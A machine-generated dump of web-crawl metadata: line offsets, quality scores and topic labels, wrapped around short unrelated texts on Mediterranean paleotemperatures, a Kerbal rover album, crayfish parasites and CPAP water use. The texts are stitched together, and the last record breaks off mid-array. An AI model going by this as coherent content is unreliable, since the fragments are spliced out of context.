1615,
1631,
1632,
1688,
1689,
1761,
1762,
1833,
1834,
1855,
1856,
1864,
1880,
1913,
1914,
1941,
1942,
1959,
1960,
2017,
2018,
2148,
2149,
2280,
2281,
2304,
2305,
2313,
2329,
2362,
2363,
2390,
2391,
2405,
2406,
2460,
2461,
2533,
2534,
2618,
2619,
2710,
2711,
2814,
2815,
2823,
2839,
2872,
2873,
2900,
2901,
2909,
2910,
2958,
2966,
2982,
3015,
3025,
3026,
3054,
3055,
3115,
3123,
3139,
3164,
3165,
3188,
3189,
3242,
3250,
3266,
3277,
3287,
3288,
3302,
3303,
3328,
3329,
3401,
3402,
3473,
3474,
3495,
3496,
3504,
3520,
3524,
3525,
3539,
3540,
3555,
3556,
3585,
3586,
3716,
3717,
3848,
3849,
3872,
3873,
3881,
3897,
3904,
3905,
3920,
3921,
3941,
3942,
3980,
3981,
4111,
4112,
4243,
4244,
4267,
4268,
4276,
4292,
4303,
4304,
4329,
4330,
4342,
4343,
4369,
4370,
4442,
4443,
4527,
4528,
4619,
4620,
4723,
4724,
4732,
4748,
4755,
4756,
4768,
4769,
4786,
4787,
4822,
4823,
4895,
4896,
4980,
4981,
5072,
5073,
5176,
5177,
5185,
5201,
5212,
5213,
5235,
5236,
5268,
5269,
5349,
5357,
5373,
5392,
5402,
5403,
5419,
5420,
5457,
5465,
5481,
5489,
5499,
5500,
5542,
5543,
5625,
5635,
5651,
5681,
5689,
5705,
5738,
5739,
5814,
5815,
5930,
5941,
5957,
5979,
6018,
6026,
6042,
6075,
6085,
6096,
6112,
6124,
6125,
6150,
6151,
6216,
6226,
6242,
6255,
6263,
6279,
6312,
6322,
6323,
6373,
6374,
6470,
6480,
6496,
6525,
6533,
6549,
6582,
6592,
6593,
6651,
6652,
6750,
6761,
6777,
6798,
6810,
6818,
6834,
6867,
6877,
6878,
6901,
6902,
6965,
6966,
7038,
7039,
7110,
7111,
7132,
7133,
7143,
7159,
7168,
7169,
7190,
7191,
7199,
7215,
7248,
7249,
7276,
7277,
7304,
7305,
7372,
7373,
7503,
7504,
7635,
7636,
7659,
7660,
7670,
7686,
7698,
7699,
7721,
7722,
7730,
7746,
7779,
7780,
7807,
7808,
7844,
7845,
7921,
7922,
8052,
8053,
8184,
8185,
8208,
8209,
8219,
8235,
8251,
8252,
8284,
8285,
8293,
8309,
8342,
8343,
8370,
8371,
8395,
8396,
8460,
8461,
8533,
8534,
8618,
8619,
8710,
8711,
8814,
8815,
8825,
8841,
8853,
8854,
8873,
8874,
8882,
8898,
8931,
8932,
8959,
8960,
8993,
8994,
9067,
9068,
9140,
9141,
9225,
9226,
9317,
9318,
9421,
9422,
9432,
9448,
9464,
9465,
9494,
9495,
9503,
9519,
9552,
9553,
9580,
9581,
9658,
9659,
9776,
9787,
9803,
9824,
9833,
9845,
9853,
9869,
9902,
9912,
9913,
9961,
9962,
10056,
10066,
10082,
10111,
10119,
10135,
10168,
10177
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 10177,
"ccnet_original_nlines": 443,
"rps_doc_curly_bracket": 0.003930429928004742,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.11014685779809952,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.00667556980624795,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.3284379243850708,
"rps_doc_frac_unique_words": 0.1818181872367859,
"rps_doc_mean_word_length": 10.57862377166748,
"rps_doc_num_sentences": 158,
"rps_doc_symbol_to_word_ratio": 0.003337780013680458,
"rps_doc_unigram_entropy": 4.4969282150268555,
"rps_doc_word_count": 814,
"rps_doc_frac_chars_dupe_10grams": 0.4432702362537384,
"rps_doc_frac_chars_dupe_5grams": 0.575775146484375,
"rps_doc_frac_chars_dupe_6grams": 0.5267680883407593,
"rps_doc_frac_chars_dupe_7grams": 0.5005226135253906,
"rps_doc_frac_chars_dupe_8grams": 0.4820578396320343,
"rps_doc_frac_chars_dupe_9grams": 0.452560693025589,
"rps_doc_frac_chars_top_2gram": 0.08175589144229889,
"rps_doc_frac_chars_top_3gram": 0.12309835851192474,
"rps_doc_frac_chars_top_4gram": 0.07920102030038834,
"rps_doc_books_importance": -570.0906372070312,
"rps_doc_books_importance_length_correction": -570.0906372070312,
"rps_doc_openwebtext_importance": -409.86962890625,
"rps_doc_openwebtext_importance_length_correction": -409.86962890625,
"rps_doc_wikipedia_importance": -285.6765441894531,
"rps_doc_wikipedia_importance_length_correction": -285.6765441894531
},
"fasttext": {
"dclm": 0.04788374900817871,
"english": 0.4162551164627075,
"fineweb_edu_approx": 2.5614330768585205,
"eai_general_math": 0.2782149314880371,
"eai_open_web_math": 0.021132590249180794,
"eai_web_code": 0.9346939325332642
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "005.1",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
},
"secondary": {
"code": "004.01",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computers and Computer science"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "3",
"label": "Apply"
},
"secondary": {
"code": "2",
"label": "Understand"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "3",
"label": "Procedural"
},
"secondary": {
"code": "2",
"label": "Conceptual"
}
},
"document_type_v1": {
"primary": {
"code": "4",
"label": "Code/Software"
},
"secondary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
}
},
"extraction_artifacts": {
"primary": {
"code": "0",
"label": "No Artifacts"
},
"secondary": {
"code": "3",
"label": "Irrelevant Content"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "8",
"label": "Documentation"
},
"secondary": {
"code": "10",
"label": "Knowledge Article"
}
},
"reasoning_depth": {
"primary": {
"code": "2",
"label": "Basic Reasoning"
},
"secondary": {
"code": "1",
"label": "No Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "4",
"label": "Highly Correct"
},
"secondary": {
"code": "3",
"label": "Mostly Correct"
}
},
"education_level": {
"primary": {
"code": "4",
"label": "Graduate/Expert Level"
},
"secondary": {
"code": "3",
"label": "Undergraduate Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
5,744,513,216,607,402,000
|
@article{10272/8286, year = {2008}, url = {http://hdl.handle.net/10272/8286}, abstract = {Planktonic foraminifer assemblages from core PRGL1-4 have been studied to reconstruct sea surface temperatures (SST) in the Gulf of Lions during Marine Isotope Stages 6 and 7 based on the modern analog technique. This method consists of a comparison between core and modern sample assemblages assuming that similar planktonic foraminifer assemblages develop under the same ecological conditions and that foraminifer ecological preferences have not changed in time. During stage 6 (glacial) a strong millennial variability is observed in SST, whereas in stage 7 (interglacial) the astronomical forcing controls SST. These features have been already reported in temperature records from other areas out of the Mediterranean Sea, which means that SST in the Gulf of Lions during stages 6 and 7 was influenced by global climate changes. Moreover, some differences exist between paleotemperature records from different areas in the Mediterranean region. In the Gulf of Lions temperature records are more extreme since this area is directly influenced by Mistral and Tramontane winds, which cause important water cooling during cold periods. Furthermore, this study suggests that seasonality in the Gulf of Lions is not influenced by Northern Hemisphere summer insolation}, keywords = {Modern analog technique}, keywords = {Sea surface temperatures}, keywords = {Gulf of Lions}, keywords = {Marine Isotope Stages 6 and 7}, title = {Reconstrucción de paleotemperaturas en el golfo de León durante los estadios isotópicos 6 y 7 utilizando la técnica de los análogos modernos}, title = {Paleotemperature estimates in the Gulf of Lions during Marine Isotope Stages 6 and 7 based on the modern analog technique}, author = {González Mora, Beatriz and Sierro, Francisco Javier and Berné, S.}, }
|
{
"url": "http://rabida.uhu.es/dspace/bibtex/handle/10272/8286",
"source_domain": "rabida.uhu.es",
"snapshot_id": "crawl=CC-MAIN-2019-30",
"warc_metadata": {
"Content-Length": "2367",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:47QI6COGAU6TT5VTFBXU5LDGNBABD7O6",
"WARC-Concurrent-To": "<urn:uuid:fe883aeb-614e-4e8f-9a22-ac07bd1ced2a>",
"WARC-Date": "2019-07-17T20:38:24Z",
"WARC-IP-Address": "150.214.167.11",
"WARC-Identified-Payload-Type": "application/x-bibtex-text-file",
"WARC-Payload-Digest": "sha1:GWAMGOAGCIPSQNZ3S6J3Y32VVGNQDQGB",
"WARC-Record-ID": "<urn:uuid:5ee68f57-2558-4e7a-a058-2502b5fb7fbd>",
"WARC-Target-URI": "http://rabida.uhu.es/dspace/bibtex/handle/10272/8286",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:bd02dbe2-eb38-43a1-9edb-b82ed1e45b52>"
},
"warc_info": "isPartOf: CC-MAIN-2019-30\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for July 2019\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-158-17-71.ec2.internal\r\nsoftware: Apache Nutch 1.15 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.1-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0
],
"line_end_idx": [
1871
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 1871,
"ccnet_original_nlines": 0,
"rps_doc_curly_bracket": 0.011758419685065746,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.25816023349761963,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.01780414953827858,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.23442135751247406,
"rps_doc_frac_unique_words": 0.5447761416435242,
"rps_doc_mean_word_length": 5.694029808044434,
"rps_doc_num_sentences": 9,
"rps_doc_symbol_to_word_ratio": 0,
"rps_doc_unigram_entropy": 4.6940999031066895,
"rps_doc_word_count": 268,
"rps_doc_frac_chars_dupe_10grams": 0.10091742873191833,
"rps_doc_frac_chars_dupe_5grams": 0.15596330165863037,
"rps_doc_frac_chars_dupe_6grams": 0.13499344885349274,
"rps_doc_frac_chars_dupe_7grams": 0.11926606297492981,
"rps_doc_frac_chars_dupe_8grams": 0.10091742873191833,
"rps_doc_frac_chars_dupe_9grams": 0.10091742873191833,
"rps_doc_frac_chars_top_2gram": 0.019659239798784256,
"rps_doc_frac_chars_top_3gram": 0.04325032979249954,
"rps_doc_frac_chars_top_4gram": 0.03604194149374962,
"rps_doc_books_importance": -144.3828887939453,
"rps_doc_books_importance_length_correction": -144.36598205566406,
"rps_doc_openwebtext_importance": -83.84012603759766,
"rps_doc_openwebtext_importance_length_correction": -83.84012603759766,
"rps_doc_wikipedia_importance": -55.4953727722168,
"rps_doc_wikipedia_importance_length_correction": -55.49536895751953
},
"fasttext": {
"dclm": 0.8124673962593079,
"english": 0.876685380935669,
"fineweb_edu_approx": 3.3204691410064697,
"eai_general_math": 0.13433748483657837,
"eai_open_web_math": 0.36446696519851685,
"eai_web_code": 0.015186309814453125
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "551.4822",
"labels": {
"level_1": "Science and Natural history",
"level_2": "Geology and Earth sciences",
"level_3": "Physical geology and Geodynamics"
}
},
"secondary": {
"code": "551.48",
"labels": {
"level_1": "Science and Natural history",
"level_2": "Geology and Earth sciences",
"level_3": "Physical geology and Geodynamics"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "4",
"label": "Analyze"
},
"secondary": {
"code": "2",
"label": "Understand"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "2",
"label": "Conceptual"
},
"secondary": {
"code": "3",
"label": "Procedural"
}
},
"document_type_v1": {
"primary": {
"code": "2",
"label": "Academic/Research"
},
"secondary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
}
},
"extraction_artifacts": {
"primary": {
"code": "0",
"label": "No Artifacts"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "3",
"label": "Academic Writing"
},
"secondary": {
"code": "8",
"label": "Documentation"
}
},
"reasoning_depth": {
"primary": {
"code": "3",
"label": "Intermediate Reasoning"
},
"secondary": {
"code": "2",
"label": "Basic Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "4",
"label": "Highly Correct"
},
"secondary": {
"code": "3",
"label": "Mostly Correct"
}
},
"education_level": {
"primary": {
"code": "4",
"label": "Graduate/Expert Level"
},
"secondary": {
"code": "3",
"label": "Undergraduate Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
-5,912,707,664,679,397,000
|
That file type is not supported!
Supported formats: JPEG, GIF, PNG, APNG, TIFF, BMP, PDF, XCF
Lighter-weight Duna rover mission
By base736 · 2 years ago · 17 images · 1,798 views · stats
After many iterations to improve efficiency, we sit on the launchpad waiting for the "go" from mission control.
The transfer stage is placed into orbit. It heads for Duna, adjusting its approach as it goes to optimize fuel efficiency.
Jettisoning the transfer stage, the rover with its heat shield approaches the planet at full escape speed, with an apoapsis of 10 km.
The craft is stable even without control as it screams through Duna's atmosphere...
And finally reaches more sane speeds.
And the parachute follows as the rover approaches the ground.
The heat shield is jettisoned. The RCS is unused, the fuel still full. That'll go on the next revision.
A gentle push from its rockets slows the descent stage as it nears the ground. The moment it touches the ground, the rover's connection to the descent stage is severed, and it sails into the distance...
Uploaded
0
Points
0
ups
0
downs
-
Views
-
Bandwidth usage
-
Comments
-
Favorites
?
-
waiting for image data
Loading views...
|
{
"url": "http://imgur.com/a/uj0rV",
"source_domain": "imgur.com",
"snapshot_id": "crawl=CC-MAIN-2015-11",
"warc_metadata": {
"Content-Length": "83436",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:AWN5NBOZXLT44VJDGKUXK2ZQKWZI536N",
"WARC-Concurrent-To": "<urn:uuid:4f3917f1-97c7-453c-a387-100c2973127f>",
"WARC-Date": "2015-03-03T12:02:35Z",
"WARC-IP-Address": "199.27.76.193",
"WARC-Identified-Payload-Type": null,
"WARC-Payload-Digest": "sha1:GKQA2FQ7KOBVZUYAL5ZZ4MSP2WKDYON6",
"WARC-Record-ID": "<urn:uuid:8be06878-c1d9-4b87-8007-393d85101cc5>",
"WARC-Target-URI": "http://imgur.com/a/uj0rV",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:8b827400-0203-4d13-82d9-b0584e7728ec>"
},
"warc_info": "robots: classic\r\nhostname: ip-10-28-5-156.ec2.internal\r\nsoftware: Nutch 1.6 (CC)/CC WarcExport 1.0\r\nisPartOf: CC-MAIN-2015-11\r\noperator: CommonCrawl Admin\r\ndescription: Wide crawl of the web with URLs provided by Blekko for February 2015\r\npublisher: CommonCrawl\r\nformat: WARC File Format 1.0\r\nconformsTo: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf"
}
|
{
"line_start_idx": [
0,
33,
94,
95,
129,
130,
189,
190,
302,
303,
426,
427,
561,
562,
646,
647,
685,
686,
748,
749,
853,
854,
1057,
1058,
1067,
1069,
1070,
1077,
1079,
1083,
1085,
1091,
1093,
1099,
1101,
1117,
1119,
1128,
1130,
1140,
1142,
1144,
1167
],
"line_end_idx": [
33,
94,
95,
129,
130,
189,
190,
302,
303,
426,
427,
561,
562,
646,
647,
685,
686,
748,
749,
853,
854,
1057,
1058,
1067,
1069,
1070,
1077,
1079,
1083,
1085,
1091,
1093,
1099,
1101,
1117,
1119,
1128,
1130,
1140,
1142,
1144,
1167,
1183
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 1183,
"ccnet_original_nlines": 42,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.2775510251522064,
"rps_doc_ut1_blacklist": 7,
"rps_doc_frac_all_caps_words": 0.040816329419612885,
"rps_doc_frac_lines_end_with_ellipsis": 0.06976743787527084,
"rps_doc_frac_no_alph_words": 0.22040815651416779,
"rps_doc_frac_unique_words": 0.631313145160675,
"rps_doc_mean_word_length": 4.646464824676514,
"rps_doc_num_sentences": 15,
"rps_doc_symbol_to_word_ratio": 0.01224489975720644,
"rps_doc_unigram_entropy": 4.513561725616455,
"rps_doc_word_count": 198,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0,
"rps_doc_frac_chars_dupe_6grams": 0,
"rps_doc_frac_chars_dupe_7grams": 0,
"rps_doc_frac_chars_dupe_8grams": 0,
"rps_doc_frac_chars_dupe_9grams": 0,
"rps_doc_frac_chars_top_2gram": 0.0130434799939394,
"rps_doc_frac_chars_top_3gram": 0.03913043066859245,
"rps_doc_frac_chars_top_4gram": 0,
"rps_doc_books_importance": -139.70849609375,
"rps_doc_books_importance_length_correction": -139.70849609375,
"rps_doc_openwebtext_importance": -81.67205047607422,
"rps_doc_openwebtext_importance_length_correction": -81.58907318115234,
"rps_doc_wikipedia_importance": -73.55361938476562,
"rps_doc_wikipedia_importance_length_correction": -73.55361938476562
},
"fasttext": {
"dclm": 0.022116539999842644,
"english": 0.9193246364593506,
"fineweb_edu_approx": 2.254157543182373,
"eai_general_math": 0.07391195744276047,
"eai_open_web_math": 0.28574883937835693,
"eai_web_code": 0.006926950067281723
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "629.432",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Engineering",
"level_3": ""
}
},
"secondary": {
"code": "629.43",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Engineering",
"level_3": ""
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "2",
"label": "Understand"
},
"secondary": {
"code": "3",
"label": "Apply"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "2",
"label": "Conceptual"
},
"secondary": {
"code": "3",
"label": "Procedural"
}
},
"document_type_v1": {
"primary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"extraction_artifacts": {
"primary": {
"code": "3",
"label": "Irrelevant Content"
},
"secondary": {
"code": "4",
"label": "Indeterminate"
}
},
"missing_content": {
"primary": {
"code": "4",
"label": "Missing Images or Figures"
},
"secondary": {
"code": "6",
"label": "Indeterminate"
}
},
"document_type_v2": {
"primary": {
"code": "10",
"label": "Knowledge Article"
},
"secondary": {
"code": "8",
"label": "Documentation"
}
},
"reasoning_depth": {
"primary": {
"code": "2",
"label": "Basic Reasoning"
},
"secondary": {
"code": "3",
"label": "Intermediate Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "6",
"label": "Not Applicable/Indeterminate"
},
"secondary": {
"code": "3",
"label": "Mostly Correct"
}
},
"education_level": {
"primary": {
"code": "2",
"label": "High School Level"
},
"secondary": {
"code": "1",
"label": "General Audience"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
3,219,162,274,513,226,000
|
Invasive Species Compendium
Detailed coverage of invasive species threatening livelihoods and the environment worldwide
Abstract
Infection with a trematode parasite differentially alters competitive interactions and antipredator behaviour in native and invasive crayfish.
Abstract
Parasites can have profound effects on host behaviour and species interactions, but the consequences of these impacts are inadequately understood. Three common crayfish in northern Wisconsin and Michigan (native Orconectes virilis, non-native O. propinquus and non-native and invasive O. rusticus) are intermediate hosts for trematode parasites, Microphallus spp. Some species in the genus Microphallus alter host behaviour, increasing their predation risk, but the effects of microphallids on crayfish are unknown. Orconectes propinquus replaces O. virilis in most lakes where they are introduced, and O. rusticus replaces both. These species replacements have major effects on macrophytes, macroinvertebrates and fish. Therefore, differential parasite impacts on crayfish could have community-level effects if competitive outcomes are altered. We examined the shelter affinity of infected and uninfected individuals of all three species in laboratory experiments in the presence and absence of a conspecific. We also observed behaviour during agonistic interactions, and measured boldness by quantifying how quickly crayfish emerged from shelter with a predatory fish present. Infection with Microphallus substantially altered crayfish shelter affinity, shelter competition and boldness, though infection affected each species differently. Infection reduced shelter affinity in O. propinquus and the ability of O. virilis to compete for shelter against uninfected conspecifics. Infected crayfish were bolder in the presence of a predatory fish. Our results suggest that infection with Microphallus alters crayfish behaviour so that all three species are more vulnerable to predation. Orconectes propinquus is likely to suffer the greatest increase in predation when infected, due to a reduced affinity for shelter coupled with increased boldness. In lakes where crayfish species coexist, O. rusticus will probably be less affected by the parasite than either congener. Therefore, crayfish parasites could alter crayfish abundance and species composition in north temperate lakes via behavioural modifications.
|
{
"url": "https://www.cabi.org/isc/abstract/20153286043",
"source_domain": "www.cabi.org",
"snapshot_id": "crawl=CC-MAIN-2022-27",
"warc_metadata": {
"Content-Length": "38886",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:HHQALPROAUKOHJTMOP74SJRPL2XO2R4V",
"WARC-Concurrent-To": "<urn:uuid:4874038a-8f46-48ad-b365-d711cf53b1ac>",
"WARC-Date": "2022-06-26T17:26:39Z",
"WARC-IP-Address": "31.193.15.234",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:JMPR2LAIOANBHUMWOL4NSSWKJOPXEMFK",
"WARC-Record-ID": "<urn:uuid:56be151d-3cb5-4173-82d1-dcbe09751b2e>",
"WARC-Target-URI": "https://www.cabi.org/isc/abstract/20153286043",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:50e238aa-e11f-4882-8f4a-51bbe9175571>"
},
"warc_info": "isPartOf: CC-MAIN-2022-27\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for June/July 2022\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-67-67-252\r\nsoftware: Apache Nutch 1.18 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.3-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: https://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0,
28,
29,
121,
122,
131,
132,
275,
276,
285,
286
],
"line_end_idx": [
28,
29,
121,
122,
131,
132,
275,
276,
285,
286,
2397
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 2397,
"ccnet_original_nlines": 10,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.31521737575531006,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.019021740183234215,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.1141304299235344,
"rps_doc_frac_unique_words": 0.48606809973716736,
"rps_doc_mean_word_length": 6.278637886047363,
"rps_doc_num_sentences": 23,
"rps_doc_symbol_to_word_ratio": 0,
"rps_doc_unigram_entropy": 4.706881046295166,
"rps_doc_word_count": 323,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0,
"rps_doc_frac_chars_dupe_6grams": 0,
"rps_doc_frac_chars_dupe_7grams": 0,
"rps_doc_frac_chars_dupe_8grams": 0,
"rps_doc_frac_chars_dupe_9grams": 0,
"rps_doc_frac_chars_top_2gram": 0.01923076994717121,
"rps_doc_frac_chars_top_3gram": 0.01380671001970768,
"rps_doc_frac_chars_top_4gram": 0,
"rps_doc_books_importance": -151.45689392089844,
"rps_doc_books_importance_length_correction": -151.45689392089844,
"rps_doc_openwebtext_importance": -74.45428466796875,
"rps_doc_openwebtext_importance_length_correction": -74.45428466796875,
"rps_doc_wikipedia_importance": -50.64616394042969,
"rps_doc_wikipedia_importance_length_correction": -50.64616394042969
},
"fasttext": {
"dclm": 0.08347635716199875,
"english": 0.9168936610221863,
"fineweb_edu_approx": 3.1602118015289307,
"eai_general_math": 0.4815874695777893,
"eai_open_web_math": 0.33413368463516235,
"eai_web_code": 0.016095099970698357
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "591.452",
"labels": {
"level_1": "Science and Natural history",
"level_2": "Zoology",
"level_3": ""
}
},
"secondary": {
"code": "577.12",
"labels": {
"level_1": "Science and Natural history",
"level_2": "Biology and Anthropology",
"level_3": "Life (Biology)"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "4",
"label": "Analyze"
},
"secondary": {
"code": "5",
"label": "Evaluate"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "2",
"label": "Conceptual"
},
"secondary": {
"code": "3",
"label": "Procedural"
}
},
"document_type_v1": {
"primary": {
"code": "2",
"label": "Academic/Research"
},
"secondary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
}
},
"extraction_artifacts": {
"primary": {
"code": "0",
"label": "No Artifacts"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "3",
"label": "Academic Writing"
},
"secondary": {
"code": "10",
"label": "Knowledge Article"
}
},
"reasoning_depth": {
"primary": {
"code": "3",
"label": "Intermediate Reasoning"
},
"secondary": {
"code": "2",
"label": "Basic Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "4",
"label": "Highly Correct"
},
"secondary": {
"code": "3",
"label": "Mostly Correct"
}
},
"education_level": {
"primary": {
"code": "3",
"label": "Undergraduate Level"
},
"secondary": {
"code": "4",
"label": "Graduate/Expert Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
-1,165,014,869,522,557,200
|
Skip to contentSkip to navigation
Philips Sleep Apnea Device Recall - Click for details
Your Questions — 4 minutes
What types of water should be used in your continuous positive airway pressure (CPAP) device?
Biron
Distilled, demineralized, bottled, ozonated, boiled or tap water? Which ones are recommended, and which ones should be avoided?
CPAP tanks are usually made of materials that tend to degrade when in contact with heated minerals. Therefore, using mineral-free water prevents premature wear and build-up of a whitish residue. That's why only two types of purified water are recommended for CPAP tanks: demineralized water and distilled water.
Distilled water
This water is free of minerals and microorganisms. It is the purest commercially sold water as it contains the fewest organic contaminants.
Demineralized (or deionized) water
This water has been stripped of all its salts and minerals using a process of demineralization (or deionization).
You can find both types of water in grocery stores, pharmacies, and supermarkets. To avoid potential contamination, keep the bottles in a cool, dark place.
Also, there are domestic water demineralization devices, such as reverse osmosis systems. When properly maintained, they make it possible to use tap water in CPAP equipment.
The following types of water are not recommended for everyday use but can be used occasionally for troubleshooting. As they contain minerals (calcium, magnesium, iron, etc.), it is necessary to thoroughly clean the tank after using the device (see the box for cleaning instructions).
Ozonated water
Ozonation is a water sterilization process designed to destroy pathogens. Indeed, ozone is an oxidizing agent and a powerful disinfectant capable of eliminating viruses and bacteria that may have survived the filtration stage.
Boiled water
Contrary to popular belief, using tap water is not harmful to you, as long as it is safe to drink. Still, it can affect the lifespan of your accessories, especially your reservoir.
Tap water
Contrary to popular belief, using tap water is not harmful to you, as long as it is safe to drink. Still, it can affect the lifespan of your accessories, especially your reservoir.
Bottled spring water shares the same properties as tap water.
Note that a water softener does not make tap water usable since it usually removes only calcium and magnesium. Purifiers equipped with a carbon filter (e.g., Brita) reduce the chlorine content without removing minerals and leave impurities that can damage your equipment.
Important reminders
• Never add essential or scented oils to the water as they can damage the device.
• Remember to empty and rinse the tank after each use.
• Every week, wash the tank with warm, soapy water and rinse with plenty of clean water. You can place certain models in the top rack of the dishwasher (check the manufacturer's instructions). Allow it to dry away from direct sunlight or any heat source before reassembling.
• In case of mineral deposits, soak the tank for 10 minutes in a solution of one part white vinegar (5% acetic acid) to two parts water. Empty the solution and rinse thoroughly before letting it dry.
Biron
|
{
"url": "https://www.biron.com/en/education-center/your-questions/water-type-choice-cpap-device/",
"source_domain": "www.biron.com",
"snapshot_id": "crawl=CC-MAIN-2021-31",
"warc_metadata": {
"Content-Length": "152836",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:YLZ5BDYEV5SNN3L4MYZK47E4HMBDK7OU",
"WARC-Concurrent-To": "<urn:uuid:0feae6fe-9653-4c71-a1de-092666060934>",
"WARC-Date": "2021-07-24T06:53:35Z",
"WARC-IP-Address": "152.195.19.97",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:B7DKXMVK3GKZVWQZU2VCEIU4UJEGUMEO",
"WARC-Record-ID": "<urn:uuid:2af138f0-5ffc-4204-b57b-f0c52f047b01>",
"WARC-Target-URI": "https://www.biron.com/en/education-center/your-questions/water-type-choice-cpap-device/",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:010e80d9-e9c3-439c-9ca7-db12c179ae70>"
},
"warc_info": "isPartOf: CC-MAIN-2021-31\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for July/August 2021\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-67-67-212.ec2.internal\r\nsoftware: Apache Nutch 1.18 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.2-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: https://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0,
34,
88,
89,
116,
117,
211,
212,
218,
219,
347,
348,
660,
661,
677,
678,
818,
819,
854,
855,
969,
970,
1126,
1127,
1301,
1302,
1586,
1587,
1602,
1603,
1830,
1831,
1844,
